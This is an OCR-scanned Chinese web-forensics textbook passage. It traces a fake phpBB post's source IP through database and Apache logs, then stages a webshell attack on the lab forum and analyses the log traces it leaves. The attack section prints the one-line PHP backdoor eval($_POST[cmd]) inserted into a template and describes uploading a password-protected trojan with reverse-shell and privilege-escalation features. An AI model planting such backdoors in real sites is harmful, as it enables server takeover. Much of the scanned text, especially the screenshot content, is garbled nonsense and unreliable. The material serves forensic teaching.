host-only,IP 地 址 为 192. 168. 111. 1 ,通过 客户 端 访问 “phpBB 论坛 ”, 在 “吃喝 玩乐 ”论坛 
里 看 到 虚假 信息 如 图 5-27 所 示 ,请 分 析 发 布 该 虚假 信息 的 可 疑 计 算 机 的 IP 地 址 信息 。 


他 论坛 首页 《 吃喝 玩乐 


中 山 广 场 正 在 …… 
发 表 回 复 kK | |Q 查找 这 个 主题 …… 预案 


中 山 广场 正在 …… 
D 由 对 过 儿 ”2012-03-16 16:28 


图 5-27 虚假 信息 页 面 


论坛 出 现 虚假 信息 帖子 ,本 节 从 数据 库 和 网 站 访问 日 志 两 方面 人 手 追 查 发 帖 计算 机 
的 IP 地 址 ,再 综合 其 他 相关 上 网 日 志 最 终 定位 发 帖 人 。 

1) 数据 库 

程序 开发 者 通常 会 在 数据 库 中 储存 帖子 具体 内 容 的 同时 保存 发 帖 IP 地 址 ,因此 可 以 
通过 网 站 定位 数据 库 , 到 数据 库 中 查找 恶意 发 帖 IP 地 址 。 具 体 步 又 如 下 : 

(1) 在 LAMP 平 台 内 定位 网 站 主 目 录 , 即 网 站 源码 所 在 目录 。 

在 服务 器 内 搜索 Apache 配置 文件 httpd. conf ,查找 DocumentRoot 指令 ,后面 跟着 
的 参数 值 就 是 网 站 主 目录 ;如 果 httpd. conf 引入 了 vhost. conf, 则 需要 在 vhost. conf 中 查 
找 DocumentRoot 指令 。 本 实验 中 ,在 /etc/httpd/extra/httpd-vhosts. conf 配置 文件 中 
找到 的 信息 如 图 5-28 所 示 。 

表明 论坛 主 目录 , 即 phpBB 网 站 源码 所 在 目录 为 /usr/local/apache/phpbb3。 
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<VirtualHost *:80> 
DocumentRoot "/usr/local/apache/phpbb3" 
DirectoryIndex index.php 

<Directory “"/usr/local/apache/phpbb3"> 
Options Indexes FoLLOwsymLlinks 
AllowOverride None 
Order allow, deny 
Allow from all| 

</Directory> 

</VirtualHost> 


图 5-28 网 站 主 目录 信息 


(2) 在 网 站 主 目录 内 搜索 数据 库 连接 文件 。 
根据 程序 员 编程 习惯 ,该 类 文件 通常 命名 为 config. php .conn. inc、sys. php 等 ,实验 
所 用 PHPBB3 论坛 的 连接 文件 为 config. php, 在 文件 中 可 见 数据 库 服务 器 IP 地 址 为 
192. 168. 111. 128 及 数据 库 名 称 myphpbb, 连 接 数据 用 户 名 为 root 及 密码 为 空 ,如 图 5-29 
所 示 。 
kzphp 
// phpBB 3.0.x auto-generated configuration file 
// Do not change anything in this file! 


$dbms = ‘mysql'; 
$dbhost = ‘192.168.111.128'; 


$dbport = $ 
$dbname = ‘myphpbb"; 
$dbuser = 'root’; 
$dbpasswd = ""; 


$tabLe_prefix = ‘phpbb3_'; 
$acm_type = ‘file’; 
$load_extensions = ""; 


图 5-29 ”config. php 配置 文件 内 容 


(3) 连接 数据 库 ,搜索 可 疑 IP 地 址 信息 。 

由 于 在 LAMP 平 台 下 ,MySQL 是 基于 命令 行 的 ,操作 起 来 特别 不 方便 ,因此 在 实验 
中 ,可 以 在 任 一 客户 端 机 器 上 安装 相应 的 图 形 管理 工具 ,来 远程 连接 访问 MySQL 数据 
库 ,进行 查询 管理 等 操作 。 本 实验 使 用 MySQL-Front 连接 MySQL 数据 库 , 具 体操 作 步 
又 如 下 : 

Q@ 创建 连接 信息 。 

在 本 机 安装 并 启动 MySQL-Front 程序 ,在 程序 窗口 内 ,选择 "文件 ”打开 登 录 信 
息 ” 命 令 , 在 弹出 对 话 框 内 单 击 “ 新 建 "按钮 ,打开 “添加 信息 ”对 话 框 ,在 该 对 话 框 内 添加 前 
面 所 找到 的 数据 库 连接 参数 ,如 图 5-30 所 示 。 

@ 连接 后 台数 据 库 。 

打开 刚 建立 的 数据 库 登 录 信息 , 即 可 连接 到 网 站 后 台数 据 , 操 作 窗 口 如 图 5-31 所 示 。 
打开 的 数据 库 如 图 5-32 所 示 。 

@ 使 用 MySQL-Front 自 带 的 全 库 搜索 功能 ,定位 到 信息 所 在 表 。 

选择 “其 他 ">" 搜索” 命令, 打开 “搜索 ”对 话 框 ,在 该 对 话 框 内 选择 数据 库 服 务 器 IP 
地 址 数据库 名 称 , 如 图 5-33 所 示 。 

单 击 * 下 一 步 ?按钮 ,在 弹出 的 对 话 框 内 输入 所 要 追查 的 敏感 信息 关键 词 , 如 图 5-34 
所 示 。 
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添加 信息 


图 5-30 “添加 信息 "对话 框 “连接 "选项 卡 图 5-31 “添加 信息 ”对 话 框 “注册 ”选项 卡 
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图 5-33 ”MySQL-Front 搜索 对 话 框 图 5-34 输入 搜索 关键 字 
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单 击 “完成 按钮 ,程序 自动 进行 全 库 搜 索 ， 
结果 如 图 5-35 所 示 。 在 myphpbb 库 内 有 三 个 表 
含有 敏感 信息 ,双击 表 名 称 , 可 直接 进入 到 各 个 
数据 表 内 ,逐一 进行 排查 ,最 后 在 phpbb3_posts 
表 内 发 现 , 该 表 在 存储 帖子 信息 的 同时 也 存储 了 
对 应 的 IP 地 址 信息 ,如 图 5-36 所 示 。 

由 数据 表 内 信息 过 滤 。 

myphpbb,phpbb3_Forums (1) 

如 果 是 正常 运行 的 论坛 网 站 ,数据 表 内 信息 || moboetespos 
量 非 常 大 ,如 果 想 快速 定位 到 可 疑 IP 地 址 信息 ， 

还 必须 借助 发 帖 时 间 来 进行 数据 过 滤 , 但 是 
phpbb3_posts 表 内 的 post_time 字段 内 容 为 一 
长 串 数字 ,不 是 所 熟知 的 时 间 格 式 , 可 在 数据 表 图 5-35 全 库 搜索 结果 
内 先 运行 以 下 SQL 语句 ,将 该 表 内 与 关键 词 相 

关 帖 子 数据 过 滤 出 来 ,同时 将 发 帖 时 间 转 换 成 网 页 页 面 所 显示 的 时 间 格 式 。 


易 MySQL-Front - 192.168.111.128 - myphpbb.phpbb3_posts ( 数 闫 浏览 器 ) 


文件 () 编辑 (W) 搜索 (视图 (Ww) 收 送 () 数据 库 () 其 地 (DD 设置 (5) 帮助 (R) 


全 @| p 国 着 多 KK 人 钰 为 浊 井 站 | 权柄 | 蕊 


欢迎 来 到 phpBB3 
i 入 中 山 广场 正在 …… 
田 | phpbb_acl_rol 


phpbb_acl_gre 


图 5-36 ”phpbb3_posts 数据 表 


select poster_ip, post_subject, 

date_add( 1970- 01— 01', interval post_time second) 
from phpbb3_posts 

Where post_subject |ike '%****** %” 


SQL 语句 运行 结果 如 图 5-37 所 示 。 


L date, 970-01-01'interval tme second) 
192.168.111.1 中 山 广场 正在 …… 2012.03.16 08:28:33 


图 5-37 phpbb3_posts 数据 表 内 敏感 信息 


最 终 ,结合 时 间 及 发 帖 内 容 来 排查 可 疑 IP 地 址 信息 为 “192. 168. 111. 1” ,注意 ,数据 
库 内 时 间 比 网 页 显示 时 间 错 后 8 小 时 ,这 与 网 站 创建 时 所 使 用 的 时 区 相关 。 
2) Apache 日 志 
如 果 在 数据 库 内 没有 找到 发 帖 IP 地 址 , 则 需 记 录 发 帖 过 程 中 所 访问 的 页 面 名 称 , 本 
实验 所 用 的 发 帖 页 面 为 http://192. 168. 111. 128/posting. php? mode 二 post&f 二 3, 结 
合 Apache 访问 日 志 分 析 过 滤 出 发 帖 IP 地 址 信息 。 上 有 具体 步 骤 如 下 : 
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(1) 在 LAMP 平 台 内 定位 网 站 访问 日 志文 件 。 

访问 日 志 默 认 位 置 为 Apache 安装 目录 下 logs 子 文件 夹 下 的 access_log。 若 安装 过 程 中 
为 网 站 指定 了 日 志 位 置 及 名 称 , 则 需要 到 httpd. conf 或 vhost. conf 配置 文件 中 ,查找 
CustomLog 指令 ,明确 网 站 访问 日 志 目 录 及 名 称 , 如 CustomLog "logs/phpbb3_access_ 
log" 。 经 分 析 , 本 实例 网 站 服务 器 访问 日 志 为 默认 位 置 , 即 logs/access_log,Apache 安装 
目录 由 主 配 文件 中 的 ServerRoot 指令 指定 为 /usr/local/apache, 访 问 日 志 实 际 位 置 为 
/usr/local/apache/logs/access_log。 

(2) 分 析 访 问 日 志 。 

网 站 在 运行 过 程 中 产生 的 访问 日 志 是 海量 的 , 需 将 其 导入 数据 库 中 或 借助 专业 工具 
进行 分 析 。 本 实验 将 访问 日 志 导 入 到 数据 库 中 进行 分 析 ,详细 步 又 参见 2. 3. 1 节 。 

Q@ 文件 预 处 理 。 

使 用 文本 编辑 工具 对 日 志文 件 进行 格式 修正 ,将 行 结尾 替换 为 数据 库 所 识别 的 符号 ， 
如 “;” 等 。 之 后 就 可 以 将 修正 好 的 日 志文 件 导 入 数据 库 中 。 在 导入 数据 库 过 程 中 ,选择 数 
据 源 为 文本 文件 , 行 分 隔 符 为 分 号 ,文本 限定 符 为 双 引 号 ,字段 分 隔 符 选择 其 他 输入 空格 ， 
结果 如 图 5-38 所 示 。 


ES ,位 置 是 "log_news“ 中 、"(local)” 上 


00 Col005 |colooe 

192. 168. 111. 1 = [15/War/2012: 17:16:57 GET / MTTP/L.1 

192.168. 111.1 = [15/War/2012:17:17:06 GET /favicon ico WITP/1.1 

192. 168. 111. 1 [1S/MWar/2012:17:55:06 GET /index. php MTTF/1.1 

192.168.111.1 ~ [15/Mar/2012:17:55:06 GET /index. php HTTP/1.1 

192. 168.111.1 [15/Mar/2012:17:55:32 GET / MITP/L.1 
[15/Mar/2012:17:55:37 GET /index. ph[ HTTP/1.1 
[1S/War/2012:17:55:40 GET /index. php MTTP/1.1 
[15/War/2012:17:55:40 GET /index. php MTTP/1.1 
[15/Mar/2012:17:57:24 GET /index. php NTTP/1.1 
[1S5/Mar/2012:17:57:30 GET /index. php NTTP/1.1 
[1S/War/2012:17:57:30 GET /index. php HITP/1.1 


[15/Mar/2012:17:58:00 GET /index. php HTTF/1.1 
192.168.111.1 - [15/Mar/2012:17:58:00 GET /index. php?=PHFE9568734-D428-11d2-AT69-0OAADO1ACF42 HTTP/1.1 
192.168. 111.1 [15/Mar/2012:17:58:00 GET /index. php?=PHFE9568735-D428-11d2-AT69-0OAADO1ACF42 HITP/1.1 
192. 168. 111.1 [1SyWar/2012:17:59:30 GET /index. php HTTP/1.1 
192, 168. 111.1 [15/Mar/2012:17:59:30 GET /index. php?=PHFE9568734-D428-11d2-AT69-00AADO1ACF42 HTTP/1.1 局 | 


rm 


图 5-38 ”access_log 数据 表 内 容 


@ 数据 库 内 对 日 志 信息 进行 过 滤 。 

根据 发 帖 所 用 页 面 的 访问 地 址 信息 http://192. 168. 111. 128/posting. php? mode 一 
post&f 二 3 及 发 帖 时 间 2012-03-16 16:28 构造 SQL 语句 ,查询 特定 日 志 信 息 。 本 实验 根 
据 实际 情况 构造 SQL 语句 

SELECT * FROM access log WHERE (Col006 LIKE '% posting. php?mode= post&f= 3% ) AND (Col004 LIKE '% 16/Mar/2012: 

16:28% ) 
进行 查询 ,结果 如 图 5-39 所 示 。 通 过 这 种 方法 能 过 滤 出 几 个 可 疑 IP 地 址 ,可 再 通过 其 他 
信息 进一步 排查 ,最终 定位 发 帖 IP 地 址 。 
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ES ,位置 是 "iog_news“ 中 、"iocal)" 上 


EELECT *# 

RON access_log 

ne edo Fre , 知 osting php?mode=post&f=3% ) AND 
(C1004 LTE '%8lar dl:18:28% | 


型 
Col001 Col002 |Col003 |Col004 [col005 Col006 
192.168.111.1 - 3 [16/Mar/2012:16:28:33 +0800] POST /posting. php?mode=post&f-3&sid-43a5ed5271d04d1d26423e21191ds 


ol 
[ [ 4 


图 5-39 access_log 数据 表 内 敏感 信息 日 志 


5.7 PHP 网 站 挂 马 攻击 痕迹 分 析 


所 谓 网 站 挂 马 , 就 是 黑客 通过 各 种 手段 ,包括 SQL 注入 等 各 种 方法 获得 网 站 管理 员 
账号 ,然后 登录 网 站 后 台 , 上 传 漏洞 获得 一 个 Webshell。 利 用 获得 的 Webshell 修改 网 站 
页 面 的 内 容 , 向 页 面 中 加 入 恶意 转向 代码 ,也 可 直接 对 网 站 页 面 进行 修改 。 当 访问 被 加 入 
恶意 代码 的 页 面 时 ,就 会 自动 地 访问 被 转向 的 地 址 或 下 载 木马 病毒 。 下 面 以 5. 4 节 所 发 
布 的 phpbb3 网 站 为 攻击 目标 进行 挂 马 ,分 析 挂 马 之 后 服务 器 端 生 成 的 痕迹 特征 。 


57.1 挂 马 攻击 过 程 


1. 打开 “在 模板 中 允许 PHP" 选 项 
通过 SQL 注入 等 方法 ,获取 网 站 的 管理 员 权 限 , 然 后 以 管理 员 身 份 登录 ,在 后 台 控制 
面板 , 选 定 服务 器 配置 ,在 安全 设 定 中 将 “在 模板 中 允许 PHP” 选 项 打开 ,如 图 5-40 所 示 。 


上 交 件 (E) 坊 模 上 查看 收 车 (A) 工具 ID 各 助 (d 


OR -OH Pm TW oO» 
| ti(®) [€] hetp Wasz.168.111.128ladmindex:phpysid-4952a48604461999 


C 同时 验 i 径 。 G 只 验证 主机 名 C 无 
私 
能 会 对 使 
由 
检查 IP 以 防御 DNS 黑洞: C 是 6 再 
A 用 ,用户 和 IP 地 和 了 y 多 n 下 在 站 和 的 DNGpL 和 
用 nt hes .oro 过 个 析 村 和 45 二 取 于 
¥ 务 明 的 设置. 加 果 让 论坛 吉 得 恨 介 或 产生 委 多 错误 报告 请 禁用 这 个 功 
检查 email 二 名 以 得 到 有 效 MX 记录 ; GB 是 C 理 
客户 端 通信 如果 司 用 ,在 注 和 时 提供 的 emai 央 名 村 检查 是 再 有 有 冰 的 MX 忆 录 ， 
鹿 码 各 杂 度 : 3 
决定 设 定 或 更 届时 密码 的 复 录 度 ,人 个 选项 则 入 前 要 加 
强制 富 码 志 更 : 加 二 天 
强制 用 户 在 一 段 时 间 天数) 后 更 改 和 码 , 访 轩 为 0 则 取 江 限制 
a BB 
越过 估 斌 次 数 局 用 户 必 须 志 行 可 视 化 间 录 验证 
在 模板 中 芬 详 PHP; 是 人 再 
如 和 局 用 这 个 选项，PH? 和 INCLUDEPHP 声明 本 在 模 和 中 详解 
提交 表单 的 最 长 时 间 : F200 秒 
在 这 个 时 间 前 用 户 必须 提交 . 使 用 -1 职 请 这 项 功能 . 广 意 如 果 设 置 的 时 间 过 长 . 当 ， 
对 话 失 灿 时 表单 了 会 自动 失效, 这 种 和 况 下 这 里 的 设置 是 无 的 
入 要 表单 天 交 限制 : 是 人 再 
局 下 后 , 游客 所 有 的 表单 格 会 是 对 主 准 一 的 ,这 个 功能 正 革 毕 [SP 中 可 能 无 法 正 委 
使 用 


图 5-40 将 “在 模板 中 允许 PHP? 选 项 打开 
472 
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2. 插 入 “一 旬 话 木马 ” 
进入 模板 编辑 菜单 , 选 定 faq_body. html 模板 .插入 一 行 PHP 代码 eval( $ _POST 
[cmd]) ,如 图 5-41 所 示 。 


编辑 模板 «后退 
| 这 里 您 可 以 直接 编辑 您 的 模板 组 ,请 记 住 这 些 编辑 是 永久 性 的 ,不 可 以 回复 , 如果 PHP 允 许 写 操作 , 这 里 的 修改 将 直接 写 入 文件 . 如 果 PHP 不 允许 写 操作 , 所 有 的 更 改 只 会 影响 
由 据 库 , 请 注意 当 编辑 模板 时 ， 用 {XXXxj 的 形式 关闭 所 有 准 代 值 变量 ,否则 会 引起 浏览 错误 
| 选中 的 模板 ; prosilver 

和 连 择 模板 文件 


入 板 文件 : [Eapbodyheml 司 [ 计生 模 术 文件 

HTML 检 板 术 辑 器 

选中 的 模板 文件 : faq_body.html 

稻 板 编辑 器 高 度 : 0 E23 

FS Bee ever poater: bial = 加 
en are 

et FA TITLE)c/ha> 


ay elesgorpanel bol” 1d"faqlinee": 
a aa piso A tn /es 
<div class="columl"> 
et 
<!-~ IF faq_ block. SWITCH_COLUNN or (SUITCH_COLUDN NANUALLY and faq_block.s_ROW_COUNT == 4) -> 
/vy 


i 
<1-~ ENDIF ~- 


dl classe"faq"> 
<dD<strong> (faq_block. BLOCK_TITLE)</strong></de> 


图 5-41 插入 “一 句 话 木马 ” 


其 作用 是 执行 POST 来 的 cmd 参数 语句 ,攻击 者 可 以 提交 任何 内 容 , 这 个 程序 把 
提交 的 数据 当 PHP 语句 执行 ,利用 这 个 功能 可 以 查看 甚至 修改 数据 库 数 据 和 文件 。 
只 要 攻击 者 打开 含有 faq_body. htm 模板 的 页 面 ,然后 提交 cmd 参数 命令 ,程序 就 会 
执行 。 

3. 上 传 木马 

在 本 机 运行 “lanker 一 句 话 PHP 后 门客 户 端 3. 0 内 部 版 >, 打开 网 站 上 fag. php 页 
面 ,这 个 页 面 用 了 faq_body. htm 模板 , 故 这 时 只 要 通过 “一 句 话 PHP 后 门客 户 端 *post 
命令 上 去 ,网 站 服务 器 端的 PHP 程序 就 会 运行 。 

“lanker 一 句 话 PHP 后 门客 户 端 3.0 内 部 版 ?是 用 JavaScript 写 的 ,其 各 个 选项 对 应 
的 是 输入 一 些 相应 的 代码 。 单 击 “ 提 交 ” 按 钮 后 ,就 会 将 代码 上 传 到 服务 器 端的 PHP 
程序 。 

其 中 ,后 门 地 址 为 http://192. 168. 111. 128/faq. php 页 面 .在 “基本 功能 列表 ”中 选 
择 % 上 传 文件 ”, 将 木马 2. php 上 传 到 服务 器 中 ,如 图 5-42 所 示 。 

4 访问 木马 

通过 地 址 http://192. 168. 111. 128/2. php 即 可 访问 所 传 的 网 页 木马 ,输入 密码 
admin, 进 入 主 界面 如 图 5-43 所 示 。 在 该 程序 中 可 执行 更 多 恶意 功能 ,如 文件 删除 、 自 改 、 
Serv-U 提 权 批量 挂 马 等 。 
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lanker 一 句 话 PHP 后 门客 户 端 3.0 内 部 版 


后 门 地 址 ; http-//192. 168. 111_ 128/faq_php 密码 : ond 生成 器 : |if Cstrlen Guoploaddir) 加 


FE 一 习 phpBB6 phpBB 论 上 


用 于 描述 您 的 论坛 的 一 小 段 文 


nmunitie 


文件 路 径 (不 填 为 当前 目录 ) 
clanker 


他 论坛 首页 ~ 
QQFAQ 听 注 册 四 登录 


webshell\2. php lo 


upfile:2,php OK! 


常见 问题 
登录 和 注册 问题 用 户 等 级 和 用 户 组 
为 什么 我 不 能 登录 ? 什么 是 管理 员 ? 
为 什么 我 必须 注册 ? 什么 是 版 主 ? 
为 什么 我 登录 后 会 自动 退出 ? 什么 是 用 户 组 ? 
我 怎样 才能 使 自己 的 用 户 名 不 出 现在 在 线 用 我 该 如 何 加 入 一 个 用 户 组 ? | 
4 » 


图 5-42 上 传 网 页 木马 成 功 界面 


192.168.111.128 2012 年 04 月 27 日 08;50;04 192.168.111.1 
1 根 目 录 Shell 目录 | 环境 变量 | 在 线 代理 | PHPINFO() | WebShell | 杂项 破解 | 解压 mix.dll | 注销 登录 | 

| 批量 挂 马 | Http 文件 下 载 | 文件 查找 | 执行 php 脚 本 | 执行 SQL 语句 | Func 反 弹 Shell | MySQL 备份 | Serv-U 提 权 | 
| 程序 路 径 ; /usr/local/apache/phpbb3 
尚 前 目录 (可 写 ,0777): /usr/local/apache/phpbb3 
网 转 目 录 ; 确定 8 支持 绝对 中 径 和 相对 路 径 ] 
| 上 传 文件 到 当前 目录 ; [到 殉 -| [确定 
| 新 建文 件 在 当前 目录 : 确定 
新建 目录 在 当前 目录 : 确定 

黑 狼 PHP 木 马 
文件 创建 日 期 最 后 峰 改 大 小 尾 性 操作 

厂 [language] 2012-03-16 05:00:27 2012-03-16 05:00:27 Search 。 0755 1 删除 | 改名 | 
CF [images] 2012-03-16 05:00:25 2012-03-16 05:00:25 Search 0755 1 删除 | 改名 | 
FF [indudes] 2012-03-16 05;00;26 2012-03-16 05:00:26 Search 0755 1 删除 | 改名 | 
FT [docs] 2012-03-16 05;00;27 2012-03-16 05:00;27 Search 0755 1 删除 | 改名 | 
厂 [fles] 2012-03-16 05:08;19 2012-03-16 05:08;19 Search 。 0777 1 删除 | 改名 | 
FT [store] 2012-03-16 05:08:19 2012-03-16 05:08:19 。 Search 0777 | 删除 | 改名 | 
厂 [cache] 2012-03-17 00:23:33 2012-03-17 00:23:33 Search 。 0777 1 删除 | 改名 | 
返回 上 绒 目 录 
三 [adm] 2012-03-16 05:00:25 2012-03-16 05:00:25 Search 0755 1 删除 | 改名 | 
DC [styles] 2012-03-16 05:00:27 2012-03-16 05:00:27 Search 0755 1 删除 | 改名 | 


图 5-43 网 页 木马 主 界面 


572 攻击 痕迹 分 析 


在 上 述 网 站 挂 马 攻击 过 程 中 ,由 于 黑客 要 进行 以 下 必要 的 尝试 及 攻击 过 程 ,必然 会 在 
网 站 的 日 志文 件 中 留 下 大 量 的 痕迹 特征 。 


1. 访 问 日 志 挂 马 痕迹 分 析 
在 Apache 访问 日 志 中 发 现 记录 如 图 5-44 所 示 。 可 以 看 到 的 是 HTTP 协议 中 的 
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OPTIONS 方法 ,该 方法 是 黑客 经 常 使 用 的 方法 ,用 来 查看 服务 器 的 性 能 。 如 果 在 日 志 
发 现 记 录 了 HTTP 的 OPTIONS 方法 , 则 可 判断 出 该 网 站 有 可 能 已 经 被 挂 马 。 


1 - - [17/Mar/2012:00:27:50 +0800] "OPTIONS * HTTP/1.0" 200 - 
:1 - - [17/Mar/2012:00:27:51 +0800] "OPTIONS * HTTP/1.0" 200 - 
1 - - [17/Mar/2012:00:27:52 +0800] "OPTIONS * HTTP/1.0" 200 - 


图 5-44 Apache 访问 日 志 挂 马 痕迹 1 


由 于 挂 马 时 要 执行 一 些 必要 的 系统 命令 ,因此 在 访问 日 志 中 还 会 出 现 一 些 PHP 页 
后 面 的 附加 资源 值 为 系统 命令 的 记录 行 ,如 dir、rename、download、shell 等 ,如 图 5-45 
所 示 。 通 过 查询 这 些 特别 的 记录 行 中 的 客户 端 IP 地 址 信息 ,可 以 追查 到 恶意 IP 地 址 。 


192.168.111.1 - - [27/Apr/2012:09:06:56 +0800] “GET /2.php?action=rename&dir=.&fname=.$ 
2Ffaql.php HTTP/1.1" 200 6339 

192,168.111.1 - - [27/Apr/2012:09:07:02 +0800] “POST /2.php?dir=,Ssfname=.%2Ffaql.php 
HTTP/1.1" 200 30875 

192.168,111.1 - - [27/Apr/2012:09:08:13 +0800] "GETL /2,.php?action=dir HTIIP/L1.1” 200 30884 
192,168.111.1 - - [27/Apr/2012:09:08:18 +0860] “GET /2.php?action=dir HTTP/1.1" 200 30884 
192.168.111.1 - - [27/Apr/2012:09:08:28 +0800] “GET /2.php?action=shell HTTP/1.1" 200 7010 
192, 168.111.1 - - [27/Apr/2012:09:08:44 +0899] "POST /2.php?action=shell&dir=. HTTP/1.1" 200 
7027 

192,168.111.1 - - [27/Apr/2012:09:08:52 +0800] “GET /2.php?action=mysqLfun HTTP/1.1”200 7153 
192.168.111.1 - - [27/Apr/2012:09:09:09 +0800] “POST /2.php?action=mysqlfun HTTP/1.1”200 
7262 

192.168.111.1 - - [27/Apr/2012:09:09:29 +0800] “GET_ /2.php?action=phpinfo _HTTP/1.1" 200 48124 
192.168.111.1 - - [27/Apr/2012:09:09:20 +0800] "GET /2.php?=PHPE9568F35-D428-11d2- 
A769-00AA001ACF42 HTTP/1.1" 200 2146 

192,168.111.1 - - [27/Apr/2012:09:;09:;20 +0800] “GET /2.php?=PHPE9568F34-D428-11d2- 


A769-00AA001ACF42 HTTP/1.1" 200 2524 
图 5-45 Apache 访问 日 志 挂 马 痕迹 2 


2. 错误 日 志 挂 马 痕 迹 分 析 

Apache 错误 日 志 默 认 在 安装 目录 下 logs 子 文件 夹 中 的 error_log， ee 
要 在 httpd. conf 或 vhost. conf 配置 文件 中 查找 ErrorLog 指令 ,明确 网 站 错误 日 志 目 录 
及 名 称 。 因 为 软件 版 本 问题 ,可 能 在 挂 马 过 程 中 产生 一 些 错误 信息 记录 在 日 志 中 ,附加 资 
源 也 是 一 些 系统 命令 ,如 dir\rename download .shell 等 ,如 图 5-46 所 示 。 通 过 查 报 错 信 
息 中 的 client 字段 值 ,也 可 以 追查 到 恶意 IP 地 址 。 


[Fri Apr 27 09:08:44 2012] [error] [client 192.168.111.1] PHP Deprecated: Call-time pass-by- 
reference has been deprecated in /usr/local/apache/phpbb3/2.php(4) : eval()'d code on Line 
1224, referer: http://192.168.111.128/2.php?action=shell 

sh: ipconfig: command not found 

[Fri Apr 27 09:08:52 2012] [error] [client 192.168.111.1] PHP Deprecated: Assigning the 
return value of new by reference is deprecated in /ysr/local/apache/phpbb3/2.php(4) : eval 
()'d code on line 587, referer: http://192.168.111.128/2.php?action=shell&di 
[Fri Apr 27 09:08:52 2012] [error] [client 192.168.111.1] PHP Deprecated: Assigning the 
return value of new by reference is deprecated in /usr/local/apache/phpbb3/2.php(4) ; eval 
()'d code on line 597, referer: http://192.168.111.128/2.php?action=shell&dir=. 


图 5-46 ”Apache 错误 日 志 挂 马 痕 迹 


当日 志 数 量 较 大 时 ,可 以 将 日 志 中 的 记录 导入 数据 库 中 或 借助 专用 软件 进行 处 理 和 
搜索 。 具 体 方法 详 见 2.3.1 节 。 
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习 题 5 


1. 选择 题 (可 多 选 ) 
(1) PHP 具有 非常 强大 的 功能 ,具有 下 面 ( ) 特 点 。 
A. 运行 速度 快 B. 很 好 的 开放 性 和 可 扩展 性 
C. 支持 多 种 数据 库 D. 面向 对 象 编程 
(2) Linux 系统 下 判断 是 否 安装 过 Apache 的 最 主要 特征 ( Ws 
A. 能 否 找 到 它 的 主要 配置 文件 httpd. conf 
B. 系统 是 否 监听 了 80 端口 
C. 能 和 否 找到 /usr/local/apache 目录 
D. 能 否 找 到 /usr/local/apache2 目录 
(3) LAMP 平 台中 接收 用 户 请 求 并 进行 相应 处 理 的 软件 是 ( ) 。 


A. Perl B. MySQL C. Apache D. PHP 
(4) LAMP 平 台中 负责 解析 执行 PHP 程序 代码 的 软件 是 ( js 
A. Perl B. MySQL C. Apache BD: PHP 


(5) Linux 操作 系统 中 软件 的 安装 主要 有 ( ) 形 式 。 
A. 源码 包 B. rpm 软件 包 C. zip 安装 包 D. rar 软件 包 
(6) Linux 操作 系统 中 安装 源码 包 软 件 通常 需要 ( ) 命 令 。 
A. configure B. make C. make install D. install 
(7) 在 “configure --prefix 一 /usr/local/apache —sysconfdir= /etc/httpd --enable-so” 
命令 中 prefix 参数 指定 的 是 ( )5 
A. 配置 文件 所 在 目录 B. 安装 目录 
C. 系统 目录 D. 网 站 主 目录 
(8) 在 “configure --prefix 二 /usr/local/php —with-config-file-path= /usr/local/php/ 
tc --with-apxs2 三 /usr/local/apache/bin/apxs” 命 令 中 with-config-file-path 参数 指定 的 
是 ( 
A. 配置 文件 所 在 目录 B. 安装 目录 
C. 系统 目录 D. 网 站 主 目 录 
(9) 在 Windows 操作 系统 下 通过 运行 XAMPP 软件 成 功 安 装 了 Apache、MySQL 及 
PHP ,假设 XAMPP 的 安装 目录 为 C:/xampp, 则 Apache 的 安装 目录 为 ( ji 
A. C:\xampp\apache B. C:\apache 
C. C:\windows\system32\apache DD. C:\Program files\apache 
(10) Apache 几 种 常用 格式 有 ( Ns 


A. 通用 日 志 格 式 B. 组 合 日 志 格 式 
C. 虚拟 主机 访问 日 志 D. 多 文件 访问 日 志 
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2. 问答 题 

(1) LAMP 是 哪些 字母 的 缩写 ? 该 平台 具有 哪些 特点 ? 

(2) 在 搭建 LAMP 平台 过 程 中 ,如 何 操 作 才能 使 得 Web 服务 器 在 接收 到 客户 端的 
PHP 页 面 请 求 时 ,将 该 请 求 转发 到 PHP 应 用 服务 器 进行 解释 执行 ? 

(3) 请 阐述 LAMP 平台 下 发 布 PHP 网 站 的 步骤。 

(4) LAMP 平台 下 如 何 配置 多 个 虚拟 主机 ? 

(5) 请 说 明 在 Windows 平台 下 发 布 PHP 网 站 与 LAMP 平台 下 发 布 PHP 网 站 有 何 
不 同 ? 

(6) 如 何 判断 Linux 系统 中 安装 了 MySQL 服务 软件 ,并 且 开 启 了 MySQL 服务 ? 

(7) 如 何 判断 Linux 系统 中 安装 了 Apache 服务 软件 ,并 且 开 启 了 Apache 服务 ? 
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6 到 JSP 概述 


JSP(Java Server Pages) 是 由 Sun Microsystems 公司 倡导 .许多 公司 参与 一 起 建立 的 
一 种 动态 网 页 技术 标准 。JSP 技术 是 用 Java 语言 作为 脚本 语言 ,JSP 网 页 为 整个 服务 器 
端的 Java 库 单 元 提供 了 一 个 接口 来 服务 于 HTTP 的 应 用 程序 。 

在 传统 的 网 页 HTML 文件 中 加 入 Java 程序 片段 和 JSP 标记 ,就 构成 了 JSP 网 页 。 
Web 服务 器 在 过 到 访问 JSP 网 页 的 请 求 时 ,首先 执行 其 中 的 程序 片段 ,然后 将 执行 结果 
以 HTML 格式 返回 给 客户 。 程 序 片 段 可 以 操作 数据 库 .重新 定向 网 页 以 及 发 送 电子 邮 
件 等 ,这 就 是 建立 动态 网 站 所 需要 的 功能 。 所 有 程序 操作 都 在 服务 器 端 执行 ,网 络 上 传送 
给 客户 端的 仅 是 得 到 的 结果 ,对 客户 浏览 器 的 要 求 最 低 , 可 以 实现 无 Plugin, 无 ActiveX， 
无 Java Applet ,甚至 无 Frame。 


61.1 什么 是 JSP 


JSP 是 基于 Java 的 技术 ,用 于 创建 可 支持 跨 平台 及 Web 服务 器 的 动态 网 页 。 从 构成 
情况 上 来 看 ,JSP 页 面 代 码 一 般 由 普通 的 HTML 语句 和 特殊 的 基于 Java 语言 的 徐 入 标 
记 组 成 ,具有 Web 和 Java 功能 的 双重 特性 。 

JSP 1.0 规范 是 1999 年 9 月 推出 的 ,同年 12 月 又 推出 了 1.1 规范 。 此 后 JSP 又 经 
历 了 几 个 版 本 ,最 新 版 本 是 2003 年 发 布 的 JSP 2.0。 本 书 介 绍 的 技术 都 基于 JSP 2.0 
规范 。 

为 了 对 JSP 技术 有 一 个 直观 的 认识 , 先 来 看 一 个 非常 简单 的 JSP 页 面 及 其 运行 效 
果 。 以 下 是 helloWorld. jsp 的 源 代码 。 


< %@ page language= “java” contentType= “text/html; charset= gbk’% > 
< html> 
< head> 
< title> Hello World!< /title> 
< /head> 
